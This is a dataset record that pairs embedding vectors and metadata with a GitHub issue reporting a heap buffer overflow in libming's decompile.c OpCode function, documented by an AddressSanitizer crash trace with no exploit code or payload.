-0.01086362637579441, 0.029011625796556473, -0.008543010801076889, 0.022120578214526176, 0.005176152102649212, 0.017636677250266075, -0.010352304205298424, 0.0074849678203463554, 0.009282461367547512, 0.019697697833180428, -0.011217618361115456, 0.007123109418898821, 0.025031181052327156, -0.009219530038535595, -0.00010638202365953475, -0.023866938427090645, -0.011131087318062782, -0.009911781176924706, -0.0018574756104499102, -0.02437039464712143, 0.009455524384975433, 0.0070955767296254635, 0.0071545750834047794, -0.029939871281385422, -0.012263862416148186, 0.0018269929569214582, -0.007264706306159496, -0.00968365278095007, 0.010501767508685589, -0.004381636623293161, -0.0007669830229133368, -0.016110576689243317, -0.0038034492172300816, -0.003687418531626463, 0.007209640461951494, 0.006186996586620808, 0.006293194368481636, -0.03220542147755623, -0.0006760267424397171, -0.019980892539024353, 0.003146597184240818, 0.009101532399654388, 0.0040630437433719635, -0.01563858799636364, -0.00946339126676321, 0.0022458836901932955, -0.018690787255764008, -0.021601390093564987, 0.002269483171403408, 0.020547280088067055, 0.01620497554540634, -0.013144909404218197, 0.006973646115511656, 0.026856206357479095, -0.00693431356921792, 0.030805185437202454, -0.0002893394266720861, -0.004857559222728014, 0.004232173319905996, -0.010887226089835167, 0.009502722881734371, 0.0015133165288716555, 0.009754450991749763, -0.0037149512208998203, -0.010643364861607552, 0.010021911934018135, -0.0042007071897387505, -0.010446702130138874, 0.002324548549950123, 0.0027513059321790934, -0.0032724610064178705, 0.008464346639811993, -0.02086193859577179, 0.02504691295325756, 0.0082126185297966, 0.001511349924840033, 0.007870426401495934, 0.002259650034829974, 0.0014966002199798822, 0.007024778053164482, -0.005978534463793039, 0.016598299145698547, 0.0016981791704893112, -0.005125020164996386, -0.013727029785513878, -0.011689607985317707, -0.021632855758070946, -0.004145641811192036, -0.0026824739761650562, -0.0354621484875679, -0.004621564410626888, -0.00048354349564760923, -0.022671231999993324, 0.008051355369389057, 0.006910713855177164, -0.0005614709225483239, -0.010147775523364544, -0.011713207699358463, -0.0010177275398746133, 0.028980160132050514, -0.030317462980747223, 0.02709220163524151, -0.023457881063222885, -0.005097487475723028, 0.009542055428028107, -0.007178174797445536, -0.014246218837797642, -0.015260996297001839, -0.0012596221640706062, -0.017888404428958893, 0.010454569011926651, -0.0017217786516994238, -0.014757541008293629, 0.027674321085214615, -0.02116086520254612, -0.011461480520665646, -0.00901500042527914, -0.005872336681932211, -0.020201154053211212, 0.022340839728713036, 0.03530481830239296, -0.027501258999109268, -0.01832892745733261, 0.0018427259055897593, -0.019052645191550255, 0.00259790918789804, -0.01672416366636753, 0.0017188286874443293, -0.012161597609519958, 0.0019420403987169266, 0.009313927963376045, -0.018863849341869354, 0.0003623503143899143, -0.0033766920678317547, -0.0012468390632420778, -0.013821427710354328, -0.008818338625133038, -0.006249928381294012, 0.003079731948673725, 0.019320106133818626, -0.00001700821849226486, 0.014395682141184807, -0.013003312982618809, -0.007988423109054565, 0.0358397401869297, -0.02083047293126583, 0.03983591869473457, 0.008967801928520203, 0.0003630878054536879, 0.00488902535289526, -0.0008171319495886564, -0.0031662634573876858, 0.00595493521541357, 0.006438724230974913, -0.012594254687428474, -0.005518344696611166, -0.004747428465634584, -0.007209640461951494, -0.017778273671865463, 0.007886159233748913, -0.0035831874702125788, 0.0011022923281416297, 0.017306284978985786, 0.009903914295136929, 0.005958868190646172, 0.021097933873534203, -0.021176598966121674, -0.006635386496782303, 0.00575827294960618, 0.026730341836810112, -0.006155530456453562, -0.0020039889495819807, -0.004365903325378895, 0.0158588495105505, -0.0018643587827682495, -0.012059333734214306, 0.010808560997247696, -0.0007748495554551482, -0.001996122533455491, 0.0369410514831543, 0.008244084194302559, -0.0014258017763495445, 0.007638364564627409, -0.02112939953804016, -0.0010659097461029887, -0.016661232337355614, 0.0050109559670090675, 0.010383770801126957, -0.00548687856644392, 0.016708429902791977, -0.0048182266764342785, -0.010902958922088146, -0.007115242537111044, 0.0020089056342840195, 0.006450524087995291, 0.00509355403482914, 0.008181152865290642, -0.014568745158612728, 0.022812828421592712, -0.0061397976242005825, 0.018344661220908165, -0.00734337093308568, 0.011713207699358463, 0.006230262108147144, 0.002841770648956299, 0.0054436130449175835, -0.005880203563719988, 0.00431083794683218, -0.003624486504122615, 0.012901048175990582, 0.009062199853360653, -0.012625721283257008, -0.02001235820353031, 0.0069815125316381454, 0.011846938170492649, 0.006265661679208279, 0.015504857525229454, -0.0031957626342773438, -0.006961846258491278, 0.0023127489257603884, -0.0013078044867143035, -0.0069382465444505215, 0.02485811710357666, 0.018675053492188454, -0.009494856931269169, 0.003534022020176053, 0.02739112824201584, 0.030521992594003677, 0.011485079303383827, -0.0010501767974346876, 0.005864470265805721, 0.00450750021263957, 0.005699274130165577, -0.005073887761682272, -0.014411414973437786, 0.001331403967924416, -0.0021023203153163195, -0.006422991398721933, -0.0061751967296004295, 0.011194019578397274, -0.028870029374957085, 0.02613248862326145, -0.004542899783700705, 0.006422991398721933, -0.0027985048945993185, 0.008928469382226467, 0.009549922309815884, 0.015630722045898438, 0.004448501858860254, 0.008204751648008823, 0.012712252326309681, 0.004409169312566519, 0.016881493851542473, -0.0009626620449125767, 0.009817383252084255, 0.0022360505536198616, -0.008818338625133038, -0.004747428465634584, -0.011634542606770992, -0.018203064799308777, 0.009542055428028107, 0.011367082595825195, 0.017479347065091133, 0.00009034175309352577, 0.003089565085247159, -0.013467435725033283, 0.0010767262428998947, -0.003410124685615301, -0.024417594075202942, 0.019351571798324585, -0.007760295178741217, 0.007909758947789669, 0.012790917418897152, 0.025613300502300262, -0.011862671002745628, 0.007917624898254871, 0.00012684719695243984, -0.006957912817597389, 0.01732201687991619, -0.00026893572066910565, 0.0055576772429049015, -0.006828115787357092, 0.017998535186052322, -0.003744450630620122, 0.010305105708539486, 0.0010334604885429144, 0.008369948714971542, -0.028020447120070457, 0.022230708971619606, 0.03307073563337326, -0.03602853789925575, 0.016110576689243317, -0.01028150599449873, -0.002159352181479335, 0.00841714721173048, 0.017259085550904274, 0.00862167589366436, -0.004059110302478075, -0.004086642991751432, -0.03505309298634529, -0.010320838540792465, 0.011304150335490704, -0.0005472128977999091, 0.013727029785513878, -0.0014995501842349768, 0.012366126291453838, 0.0021416526287794113, -0.004546832758933306, 0.02352081425487995, -0.00548687856644392, -0.011996401473879814, -0.013986623845994473, -0.006100465077906847, -0.002822104375809431, 0.007174241356551647, -0.016031911596655846, -0.011020956560969353, -0.006131931208074093, 0.024873850867152214, -0.002511377912014723, 0.006887114606797695, -0.029829740524291992, -0.010541100054979324, -0.009612854570150375, -0.015489124692976475, 0.0036638190504163504, 0.004330504219979048, 0.012531323358416557, -0.015504857525229454, -0.000541313027497381, 0.017007358372211456, 0.0158667154610157, 0.010305105708539486, 0.007980557158589363, -0.003121030982583761, -0.002011855598539114, 0.005302016157656908, 0.018092934042215347, 0.018297461792826653, -0.01925717480480671, 0.012153731659054756, 0.013365170918405056, -0.006529189180582762, -0.0011829239083454013, 0.0028358707204461098, -0.014765406958758831, 0.004637297708541155, -0.005644208751618862, -0.00367168546654284, 0.003136764047667384, -0.03876607492566109, 0.006540988571941853, -0.004009944852441549, -0.025440238416194916, 0.026226887479424477, -0.008362081833183765, -0.020059557631611824, 0.01222452986985445, 0.0278001856058836, -0.007433835882693529, 0.010092710144817829, 0.017101755365729332, -0.03445523977279663, 0.0043855695985257626, -0.0030403994023799896, -0.0021888515911996365, -0.0008338482584804296, -0.001464150962419808, 0.025927960872650146, 0.004177107475697994, 0.019996624439954758, 0.004727762192487717, 0.008991401642560959, -0.007410236168652773, -0.004456368274986744, -0.0123189277946949, 0.02108220010995865, 0.004641230683773756, -0.005951001774519682, 0.008480079472064972, 0.012004268355667591, 0.012720119208097458, -0.005742539651691914, 0.012547056190669537, -0.030584923923015594, -0.005974601488560438, -0.0029165023006498814, -0.003929313272237778, 0.004523233510553837, -0.017589477822184563, 0.0031092313583940268, -0.007103443145751953, -0.022891493514180183, -0.006808449514210224, -0.022608300670981407, -0.008629542775452137, 0.022482436150312424, -0.009494856931269169, -0.004263638984411955, -0.00022886577062308788, -0.0007089676801115274, 0.012059333734214306, 0.006049333140254021, 0.0037641169037669897, -0.00016912959108594805, 0.0067651839926838875, 0.01272798515856266, -0.019021179527044296, -0.00007178174564614892, 0.024213064461946487, -0.006049333140254021, -0.006316793616861105, -0.010084844194352627, 0.007402369752526283, 0.019021179527044296, -0.02910602279007435, -0.002273416379466653, 0.022797096520662308, 0.006670786067843437, -0.02303309179842472, 0.003079731948673725, 0.0011888237204402685, 0.02665167860686779, -0.02964094467461109, 0.007693429943174124, -0.020657410845160484, -0.0017866771668195724, 0.010997356846928596, 0.00938472617417574, 0.02493678219616413, -0.020956337451934814, 0.012043600901961327, 0.007728829048573971, -0.01615777611732483, 0.018690787255764008, -0.012625721283257008, -0.0031583968084305525, -0.009416191838681698, 0.002371747512370348, 0.0014513679780066013, -0.014285551384091377, 0.006596054416149855, 0.01065909769386053, 0.019508901983499527, -0.01865932159125805, -0.002285216236487031, -0.005573410075157881, -0.010706297121942043, -0.0024681121576577425, 0.012861715629696846, -0.018407592549920082, 0.024008536711335182, -0.011319883167743683, -0.0004528150020632893, -0.01026577316224575, 0.008818338625133038, 0.015426192432641983, 0.005931335501372814, 0.00596280163154006, 0.017809739336371422, -0.0064347912557423115, -0.0042715054005384445, 0.021208064630627632, -0.023410683497786522, -0.006407258566468954, -0.024275997653603554, -0.032819006592035294, 0.011768273077905178, -0.00028909361572004855, -0.019619032740592957, -0.0022655499633401632, -0.01795133575797081, -0.0034907562658190727, 0.020547280088067055, 0.023615211248397827, -0.0006716018542647362, -0.0162364412099123, -0.0058526708744466305, -0.009502722881734371, 0.01508006639778614, -0.02466932125389576, -0.009424058720469475, 0.00028565202956087887, 0.007469234988093376, 0.014655276201665401, -0.00988818146288395, -0.015378993935883045, 0.0012832216452807188, -0.005128953140228987, -0.002863403409719467, -0.034203510731458664, -0.0019872726406902075, 0.004232173319905996, 0.012885315343737602, -0.00637185899540782, 0.012759451754391193, 0.00637185899540782, -0.01113895419985056, 0.011784005910158157, -0.020924871787428856, -0.004255772568285465, -0.009337526746094227, -0.014804739505052567, 0.003532055299729109, 0.0164252370595932, 0.0022203174885362387, -0.006910713855177164, -0.008590210229158401, 0.0016057478496804833, 0.02967241033911705, 0.01142214797437191, 0.01222452986985445, -0.010958024300634861, -0.01087935920804739, 0.0038093491457402706, 0.011430013924837112, -0.006234195549041033, 0.002432712819427252, 0.015795918181538582, -0.006930380128324032, 0.000979869975708425, 0.00411417568102479, 0.001732595032081008, 0.018863849341869354, 0.025094112381339073, 0.017117489129304886, 0.0022104845847934484, -0.009707252494990826, 0.006710118614137173, 0.020437147468328476, -0.007870426401495934, 0.007209640461951494, 0.019902227446436882, 0.010981624014675617, -0.005600942764431238, -0.008189018815755844, 0.01851772330701351, 0.002979434095323086, -0.002165252109989524, -0.034958694130182266, 0.002955834614112973, 0.002361914375796914, 0.004617631435394287, -0.0037660833913832903, 0.004263638984411955, -0.003156430320814252, -0.014623810537159443, -0.0016735963290557265, -0.005250883754342794, 0.025802096351981163, -0.006631453521549702, 0.005203684791922569, 0.01407315582036972, 0.023866938427090645, 0.015559922903776169, -0.001295021385885775, -0.012586388736963272, -0.008802605792880058, 0.004676629789173603, -0.001104258932173252, 0.0006121114711277187, 0.0005186968483030796, 0.005022755824029446, 0.005128953140228987, -0.014930603094398975, 0.023158954456448555, -0.0023855138570070267, -0.005801538471132517, 0.009675785899162292, 0.005793672055006027, 0.003842781763523817, 0.0014631677186116576, 0.006627520080655813, 0.010840026661753654, -0.009840982966125011, -0.014002357609570026, -0.011005223728716373, 0.006812382955104113, 0.0003594003792386502, 0.004047310445457697, -0.0024681121576577425, 0.03750743716955185, 0.014317017048597336, 0.01006124448031187, -0.006430857814848423, -0.003842781763523817, 0.0028299707919359207, -0.0036441527772694826, 0.02295442670583725, 0.009038600139319897, 0.025691965594887733, 0.019021179527044296, 0.0037778832484036684, 0.003775916527956724, 0.013089844025671482, 0.019650498405098915, 0.0073040383867919445, 0.01626790687441826, 0.011225485242903233, -0.01971343159675598, -0.0044878339394927025, -0.003516322234645486, 0.02665167860686779, 0.00539248064160347, -0.016960158944129944, -0.008149686269462109, 0.0010973757598549128, 0.0032252620439976454, 0.06189356744289398, 0.012130131945014, -0.008165419101715088, 0.017337750643491745, 0.008244084194302559, -0.028020447120070457, -0.026997802779078484, 0.016440970823168755, -0.009140864945948124, 0.021821651607751846, -0.018423326313495636, -0.00576613936573267, 0.012885315343737602, -0.007964824326336384, 0.013538233935832977, 0.006627520080655813, 0.03624879941344261, 0.003358992515131831, -0.010446702130138874, 0.020987803116440773, 0.0007192924385890365, -0.008362081833183765, 0.012554922141134739, -0.002273416379466653, -0.00595493521541357, 0.005604876205325127, 0.007736695930361748, 0.00015302786778192967, -0.01612631045281887, -0.00468449667096138, -0.001867308747023344, 0.02325335331261158, -0.016739897429943085, -0.02265550009906292, -0.0005644208868034184, -0.019194241613149643, -0.02284429594874382, -0.008362081833183765, -0.0073827034793794155, 0.018344661220908165, -0.00450750021263957, -0.0024582790210843086, -0.00673765130341053, 0.010352304205298424, -0.0015801817644387484, -0.01543405931442976, 0.0007728828932158649, 0.0031642967369407415, -0.011186152696609497, 0.007252906449139118, 0.008035622537136078, 0.0015270828735083342, -0.009007134474813938, -0.015378993935883045, 0.006961846258491278, 0.011791872791945934, -0.00735123734921217, -0.0010049444390460849, -0.0024012469220906496, 0.0015201997011899948, 0.0041063092648983, -0.006615720689296722, -0.007984490133821964, 0.016393771395087242, 0.021003535017371178, -0.01161094382405281, -0.003689385252073407, 0.0009970780229195952, 0.009140864945948124, 0.025471704080700874, -0.00498342327773571, -0.008425014093518257, 0.01821879670023918, 0.0004311821248847991, -0.014930603094398975, 0.022891493514180183, 0.005982467904686928, -0.011241218075156212, 0.010210707783699036, 0.017668142914772034, 0.009258861653506756, -0.03075798787176609, 0.0023501147516071796, 0.011013089679181576, 0.005927402526140213, 0.003646119497716427, 0.00009925301856128499, 0.005518344696611166, -0.006037533283233643, 0.002440579468384385, -0.012861715629696846, -0.010423103347420692, -0.022702697664499283, 0.0032173956278711557, 0.022608300670981407, 0.0004156949871685356, 0.001592964748851955, 0.005825137719511986, -0.0035497548524290323, -0.02904309146106243, -0.01906837895512581, 0.0065488554537296295, 0.013325839303433895, 0.012625721283257008, 0.00957352202385664, 0.01765240915119648, 0.01993369311094284, 0.01672416366636753, 0.023693876340985298, -0.016252174973487854, 0.023977071046829224, -0.01705455593764782, 0.012712252326309681, -0.0021023203153163195, -0.013892225921154022, -0.003966678865253925, -0.02097206935286522, -0.036783721297979355, -0.0020492214243859053, -0.0024956448469311, 0.037192776799201965, 0.02452772483229637, 0.01563858799636364, -0.009219530038535595, -0.006450524087995291, -0.004204640630632639, -0.003152497112751007, 0.007508567534387112, -0.006328593473881483, 0.0007561666425317526, -0.01906837895512581, 0.00693431356921792, 0.018911048769950867, 0.003986345138400793, 0.055977962911129, 0.007583299186080694, 0.019430236890912056, 0.002851603552699089, 0.00010963924432871863, 0.011752540245652199, -0.013042645528912544, -0.0007256839890033007, -0.012657186947762966, 0.00694217998534441, -0.006753384135663509, 0.009424058720469475, 0.01664549857378006, 0.000003042120169993723, 0.00009642599616199732, -0.0011642409954220057, -0.019886493682861328, -0.006348259747028351, -0.028508169576525688, -0.015512723475694656, 0.00014036773063708097, -0.003260661382228136, 0.02466932125389576, -0.0008176235714927316, -0.0013146876590326428, 0.016024045646190643, 0.01302691176533699, 0.010729895904660225, 0.012987579219043255, -0.01952463574707508, 0.012216662988066673, -0.001160307670943439, 0.013278639875352383, -0.007429902441799641, 0.01784120500087738, 0.012216662988066673, -0.002216384280472994, 0.015150865539908409, 0.0037582169752568007, -0.01457661110907793, -0.0028181711677461863, 0.026038091629743576, -0.017935603857040405, -0.00792942475527525, -0.010745629668235779, 0.02303309179842472, -0.014018090441823006, -0.018911048769950867, -0.0003925871569663286, 0.01264932006597519, 0.011933469213545322, -0.00538461422547698, -0.007736695930361748, -0.005420013330876827, 0.016802828758955002, -0.010517501272261143, -0.006773050408810377, -0.0005619626026600599, -0.004354103934019804, 0.005754339508712292, -0.011579477228224277, -0.026447148993611336, -0.006946112960577011, 0.011784005910158157, -0.021491259336471558, 0.01773107424378395, 0.0034789564087986946, 0.021506991237401962, 0.005864470265805721, 0.00529021630063653, 0.008055288344621658, 0.0033137600403279066, -0.0017620944418013096, -0.015268862247467041, 0.000017361595382681116, -0.007111309561878443, 0.009054332971572876, -0.013459568843245506, 0.00646625692024827, -0.01892678253352642, -0.007504634093493223, -0.0041338419541716576, -0.006222395692020655, -0.00401191134005785, -0.014655276201665401, 0.016488168388605118, -0.008267683908343315, 0.014529412612318993, -0.015032867901027203, 0.008897003717720509, -0.007799627725034952, 0.005467212293297052, 0.004483900964260101, 0.012373993173241615, -0.007709162775427103, 0.014364215545356274, 0.0041338419541716576, 0.013042645528912544, 0.012255995534360409, 0.0008535144734196365, -0.006411191541701555, -0.003640219569206238, -0.013097710907459259, 0.0003940621390938759, -0.020500080659985542, -0.01917850971221924, -0.023489346727728844, -0.01478113979101181, 0.005164352711290121, -0.0078350268304348, 0.0038860475178807974, 0.009093665517866611, -0.007252906449139118, -0.0007070010178722441, 0.008897003717720509, -0.012845982797443867, 0.004535032901912928, 0.006969712674617767, 0.018580656498670578, 0.008196885697543621, -0.0207203421741724, 0.009156597778201103, 0.03240995109081268, 0.0033275263849645853, 0.014600210823118687, 0.00976231787353754, 0.013349438086152077, 0.004078776575624943, 0.009416191838681698, 0.001542815938591957, -0.00852727796882391, -0.019320106133818626, 0.0032370619010180235, 0.014930603094398975, -0.012735852040350437, 0.02404000237584114, 0.0032567279413342476, 0.008692475035786629, 0.009707252494990826, 0.007457435131072998, -0.01881665177643299, 0.06947686523199081, -0.0056953406892716885, 0.012869582511484623, -0.024905316531658173, -0.0053413487039506435, -0.010210707783699036, -0.010179242119193077, 0.0034396240953356028, -0.030506258830428123, 0.005699274130165577, 0.0025310441851615906, 0.012491990812122822, 0.0015585488872602582, -0.007917624898254871, 0.013317972421646118, -0.012350393459200859, 0.03942686319351196, -0.021805917844176292, 0.009919647127389908, -0.0036992181558161974, -0.0025723432190716267, 0.002822104375809431, 0.003038432914763689, 0.006733717862516642, -0.01211439911276102, -0.0005708123790100217, -0.0015870649367570877, 0.023080289363861084, 0.0018033934757113457, -0.0033196599688380957, 0.002841770648956299, -0.0002728689578361809, -0.006053266115486622, 0.004617631435394287, 0.002497611567378044, 0.015803784132003784, 0.012295328080654144, 0.02097206935286522, 0.026604479178786278, 0.0022104845847934484, 0.008834071457386017, -0.02578636258840561, 0.006226329132914543, 0.009628587402403355, 0.0001967852294910699, -0.017558012157678604, -0.007127042394131422, 0.005042422097176313, -0.0010993423638865352, 0.004712029360234737, -0.015410459600389004, 0.01746361330151558, -0.003994211554527283, -0.015591388568282127, 0.006887114606797695, -0.0007959907525219023, -0.002098386874422431, 0.028492437675595284, -0.0000583533983444795, -0.016582567244768143, -0.009424058720469475, -0.0024779452942311764, 0.012004268355667591 ]
2,084
null
null
null
null
null
null
null
null
null
[ "libming", "libming" ]
==4825==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6120000002f0 at pc 0x000000548765 bp 0x7fff85633220 sp 0x7fff85633218 READ of size 1 at 0x6120000002f0 thread T0 #0 0x548764 in OpCode /libming-ming-0_4_8/util/decompile.c:868:37 #1 0x5328f8 in decompileINCR_DECR /libming-ming-0_4_8/util/decompile.c:1440:12 #2 0x52c51d in decompileAction /libming-ming-0_4_8/util/decompile.c:3225:10 #3 0x5471d0 in decompileActions /libming-ming-0_4_8/util/decompile.c:3401:6 #4 0x546dd6 in decompile5Action /libming-ming-0_4_8/util/decompile.c:3423:2 #5 0x51f261 in outputSWF_DOACTION /libming-ming-0_4_8/util/outputscript.c:1548:29 #6 0x51c3c9 in outputBlock /libming-ming-0_4_8/util/outputscript.c:2079:4 #7 0x5287fe in readMovie /libming-ming-0_4_8/util/main.c:277:4 #8 0x526ddc in main /libming-ming-0_4_8/util/main.c:350:2 #9 0x7f402b5d382f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #10 0x419ed8 in _start (/libming-ming-0_4_8/util/swftophp+0x419ed8) 0x6120000002f0 is located 40 bytes to the right of 264-byte region [0x6120000001c0,0x6120000002c8) allocated by thread T0 here: #0 0x4d2750 in calloc /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74 #1 0x57ffc5 in parseSWF_DOACTION /libming-ming-0_4_8/util/parser.c:2428:3 #2 0x5298b5 in blockParse /libming-ming-0_4_8/util/blocktypes.c:145:14 #3 0x5285bb in readMovie /libming-ming-0_4_8/util/main.c:265:11 #4 0x526ddc in main /libming-ming-0_4_8/util/main.c:350:2 #5 0x7f402b5d382f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow /libming-ming-0_4_8/util/decompile.c:868:37 in OpCode Shadow bytes around the buggy address: 0x0c247fff8000: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c247fff8010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c247fff8020: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa 0x0c247fff8030: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c247fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c247fff8050: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa[fa]fa 0x0c247fff8060: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c247fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c247fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c247fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4825==ABORTING
Heap Buffer Overflow in function OpCode decompile.c 868
https://api.github.com/repos/libming/libming/issues/223/comments
0
2021-06-21T05:56:13
2021-06-21T05:57:33Z
https://github.com/libming/libming/issues/223
925,852,236
223
false
This is a GitHub Issue repo:libming owner:libming Title : Heap Buffer Overflow in function OpCode decompile.c 868 Issue date: --- start body --- ==4825==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6120000002f0 at pc 0x000000548765 bp 0x7fff85633220 sp 0x7fff85633218 READ of size 1 at 0x6120000002f0 thread T0 #0 0x548764 in OpCode /libming-ming-0_4_8/util/decompile.c:868:37 #1 0x5328f8 in decompileINCR_DECR /libming-ming-0_4_8/util/decompile.c:1440:12 #2 0x52c51d in decompileAction /libming-ming-0_4_8/util/decompile.c:3225:10 #3 0x5471d0 in decompileActions /libming-ming-0_4_8/util/decompile.c:3401:6 #4 0x546dd6 in decompile5Action /libming-ming-0_4_8/util/decompile.c:3423:2 #5 0x51f261 in outputSWF_DOACTION /libming-ming-0_4_8/util/outputscript.c:1548:29 #6 0x51c3c9 in outputBlock /libming-ming-0_4_8/util/outputscript.c:2079:4 #7 0x5287fe in readMovie /libming-ming-0_4_8/util/main.c:277:4 #8 0x526ddc in main /libming-ming-0_4_8/util/main.c:350:2 #9 0x7f402b5d382f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #10 0x419ed8 in _start (/libming-ming-0_4_8/util/swftophp+0x419ed8) 0x6120000002f0 is located 40 bytes to the right of 264-byte region [0x6120000001c0,0x6120000002c8) allocated by thread T0 here: #0 0x4d2750 in calloc /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74 #1 0x57ffc5 in parseSWF_DOACTION /libming-ming-0_4_8/util/parser.c:2428:3 #2 0x5298b5 in blockParse /libming-ming-0_4_8/util/blocktypes.c:145:14 #3 0x5285bb in readMovie /libming-ming-0_4_8/util/main.c:265:11 #4 0x526ddc in main /libming-ming-0_4_8/util/main.c:350:2 #5 0x7f402b5d382f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow /libming-ming-0_4_8/util/decompile.c:868:37 in OpCode Shadow bytes around the buggy address: 0x0c247fff8000: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c247fff8010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c247fff8020: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa 0x0c247fff8030: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c247fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c247fff8050: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa[fa]fa 0x0c247fff8060: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c247fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c247fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c247fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4825==ABORTING --- end body ---
3,401
[ -0.03599008172750473, -0.000041138107917504385, -0.0019429799867793918, -0.004007052164524794, 0.04194928705692291, 0.027007238939404488, -0.027564996853470802, 0.04332900419831276, -0.01949218101799488, 0.048877231776714325, -0.03393518179655075, -0.0074636852368712425, 0.0038345875218510628, 0.02254517376422882, -0.013841209933161736, 0.0060729593969881535, 0.004208872560411692, 0.009834157302975655, -0.025422031059861183, -0.022868085652589798, 0.013672414235770702, -0.011808328330516815, -0.02567155472934246, 0.04517841339111328, -0.05248798057436943, -0.01439896784722805, -0.026361413300037384, 0.001721894950605929, 0.0033814089838415384, 0.011177180334925652, -0.01640983298420906, 0.03390582650899887, -0.002379646059125662, -0.004975790157914162, 0.048965297639369965, 0.007948054000735283, 0.04362256079912186, 0.037604644894599915, -0.01496406551450491, 0.02151772379875183, -0.005625284742563963, -0.06663742661476135, -0.036665260791778564, 0.02972264029085636, -0.004755622241646051, 0.01956556923687458, 0.008916792459785938, -0.04506099224090576, -0.040510859340429306, 0.015852075070142746, 0.026508191600441933, 0.0031722497660666704, -0.017686806619167328, -0.024350548163056374, 0.020064616575837135, -0.019139911979436874, 0.01761341653764248, 0.014200816862285137, -0.009408500045537949, -0.012879811227321625, -0.024497326463460922, 0.0006146348314359784, 0.0005536300595849752, 0.015426416881382465, -0.00976810697466135, -0.008542506955564022, -0.006909596733748913, 0.010069003328680992, -0.008432422764599323, 0.006296796258538961, -0.02796129882335663, -0.03281966596841812, 0.007926037535071373, 0.04802591726183891, 0.00929841585457325, -0.006942621432244778, 0.05471901223063469, 0.0027374185156077147, -0.050110168755054474, 0.03619557246565819, -0.038690805435180664, 0.010744184255599976, -0.005089543294161558, 0.0373404435813427, 0.015529162250459194, 0.002109940629452467, -0.03079412318766117, -0.06998397409915924, -0.03613685816526413, -0.045853592455387115, -0.023367132991552353, 0.007342592813074589, 0.004307948052883148, 0.03393518179655075, -0.00220901588909328, 0.011668888852000237, -0.026288023218512535, -0.021297555416822433, -0.04541325941681862, 0.014186139218509197, -0.03094090148806572, 0.029120849445462227, 0.0020897584035992622, 0.0026768723037093878, 0.02487895078957081, 0.04012923315167427, -0.011015724390745163, -0.02369004487991333, 0.03816240280866623, 0.09781317412853241, 0.011646871455013752, -0.018919745460152626, -0.0007004085346125066, 0.017877617850899696, 0.016996946185827255, 0.01849408820271492, 0.01389992143958807, -0.0007114168838597834, -0.04250704497098923, -0.01956556923687458, -0.00007895076123531908, -0.0059261806309223175, -0.02382214553654194, 0.00820491649210453, -0.021136099472641945, 0.02162046916782856, 0.005973883904516697, -0.04878916218876839, -0.01395129319280386, -0.04940563440322876, -0.009232365526258945, -0.034463584423065186, 0.021972736343741417, -0.012725693173706532, -0.010575388558208942, -0.0185234434902668, -0.0005930767511017621, 0.017026303336024284, 0.036635905504226685, -0.00865992996841669, -0.044884856790304184, -0.018905067816376686, 0.0026438471395522356, -0.014288883656263351, -0.009533261880278587, 0.022882763296365738, -0.005984892137348652, 0.033494848757982254, -0.03217384219169617, 0.02484959550201893, 0.005860130302608013, -0.03296644613146782, 0.02672835998237133, 0.003339210292324424, 0.0038015623576939106, -0.006594022735953331, 0.017158403992652893, 0.037604644894599915, 0.010046985931694508, -0.029385048896074295, -0.02978135086596012, -0.026376090943813324, 0.007419651839882135, -0.0013292625080794096, -0.01731985993683338, -0.011712921783328056, 0.027051271870732307, 0.009680040180683136, -0.012593592517077923, 0.025921078398823738, 0.031205102801322937, 0.03196835145354271, 0.017026303336024284, 